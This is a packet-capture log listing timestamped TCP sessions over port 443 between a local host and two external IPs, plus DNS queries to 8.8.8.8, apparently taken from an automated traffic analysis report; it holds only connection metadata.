Jun 11, 2021 11:02:11.089243889 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089258909 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089317083 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089328051 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089376926 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089376926 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089421034 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089437008 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089467049 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089689016 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089740038 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089756966 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089787006 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263564110 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263622046 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263659000 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263664961 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263689041 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263705015 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263731003 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263744116 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263758898 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263784885 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263792038 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263834000 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263834953 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263878107 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263885021 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263916969 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263945103 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.263972044 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.263979912 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264012098 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264017105 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264050961 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264065027 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264091969 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264100075 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264132023 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264146090 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264180899 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264269114 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264311075 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264326096 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264360905 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264360905 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264405012 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264436960 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264445066 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264450073 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264486074 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264492989 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264527082 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264544964 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264564991 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264573097 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264605045 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264633894 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264643908 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264646053 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264693022 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264698982 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264738083 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264751911 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264776945 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264786005 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264816999 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264836073 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264854908 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264859915 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264894962 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264920950 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264934063 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264946938 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.264977932 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.264992952 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265041113 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265238047 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265304089 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265448093 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265512943 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265535116 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265583992 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265604019 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265628099 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265635967 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265667915 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265683889 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265708923 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265723944 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265748978 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265758038 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265788078 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265806913 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265826941 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265841961 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265883923 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.265933990 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.265974998 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266030073 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266046047 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266062021 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266117096 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266159058 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266202927 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266223907 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266242027 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266283035 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266297102 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266309977 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266323090 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266357899 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266360998 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266375065 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266401052 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266417980 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266457081 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266549110 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266623020 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266635895 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266674995 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266719103 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266721964 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266731024 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266782999 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266882896 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266922951 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.266962051 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.266972065 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267087936 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267199993 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267205000 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267262936 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267271042 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267318964 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267328978 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267389059 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267390966 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267431974 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267453909 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267469883 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267498016 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267510891 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267525911 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267550945 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267590046 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267636061 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267637968 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267658949 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267680883 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267705917 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267724037 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267745972 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267765999 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267793894 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267803907 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267842054 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267843962 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267855883 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267910004 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267913103 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.267967939 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.267982960 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.268033028 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.268254042 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.268296957 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.268311024 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.268362999 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.268718004 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.268754959 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.268788099 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.268805981 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.437279940 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.437303066 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.437372923 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.437423944 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438426018 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438442945 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438456059 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438472986 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438544035 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438543081 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438561916 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438577890 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438594103 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438608885 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438611984 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438630104 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438652039 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438653946 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438669920 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438685894 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438697100 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438704014 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438723087 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438723087 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438749075 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438775063 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438783884 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438838959 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.438972950 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.438988924 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439029932 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439054966 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439131975 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439188004 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439243078 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439260960 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439281940 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439299107 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439301014 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439316034 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439327955 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439333916 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439352036 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439397097 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439421892 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439666986 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439686060 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439702034 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439718008 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439728975 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439735889 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439754009 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.439757109 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.439815044 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440001965 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440027952 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440063000 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440123081 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440269947 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440320969 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440360069 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440383911 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440524101 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440583944 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440608025 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440630913 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.440669060 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.440706968 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.463862896 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.636943102 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.671715021 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.831346035 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.831490993 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.832072020 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.991539001 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.992480040 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.992521048 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.992558002 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.992584944 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.992628098 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.992669106 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.992676020 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.992681980 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:11.996078014 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:11.996160030 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:12.094750881 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:12.295825958 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:12.308408976 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:12.308547974 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:12.309443951 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:12.468997955 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:12.809977055 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:12.810106039 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:12.810365915 CEST	443	49723	192.185.33.154	192.168.2.3
Jun 11, 2021 11:02:12.810435057 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:13.174715996 CEST	49723	443	192.168.2.3	192.185.33.154
Jun 11, 2021 11:02:13.334196091 CEST	443	49723	192.185.33.154	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 11:01:51.646730900 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:01:51.701337099 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 11, 2021 11:01:53.411303043 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:01:53.461457014 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 11, 2021 11:01:54.537827969 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:01:54.591109991 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 11, 2021 11:01:56.994041920 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:01:57.047053099 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:00.392600060 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:00.454271078 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:02.642544985 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:02.692666054 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:03.567414045 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:03.650815964 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:04.116929054 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:04.175929070 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:05.164887905 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:05.215507030 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:06.024506092 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:06.075067043 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:06.209568024 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:06.270195961 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:06.967197895 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:07.017791033 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:08.211253881 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:08.261795044 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:08.299072027 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:08.349015951 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:09.937530041 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:10.004744053 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:10.016731977 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:10.067039967 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:11.155056000 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:11.205396891 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:11.481847048 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:11.669271946 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:12.186191082 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:12.236732006 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:12.272711039 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:12.323201895 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:15.409883022 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:15.462820053 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:16.298429966 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:16.352140903 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:17.549199104 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:17.599546909 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:18.756428003 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:18.807145119 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:19.675369024 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:19.725904942 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:24.739000082 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:24.816112041 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:27.969533920 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:28.019932032 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:30.040194988 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:30.090717077 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:46.400965929 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:46.461443901 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 11, 2021 11:02:54.546292067 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:02:54.618474007 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 11, 2021 11:03:09.308240891 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 11, 2021 11:03:09.369434118 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 11, 2021 11:03:13.965982914 CEST	61946	53	192.168.2.3	8.8.8.8
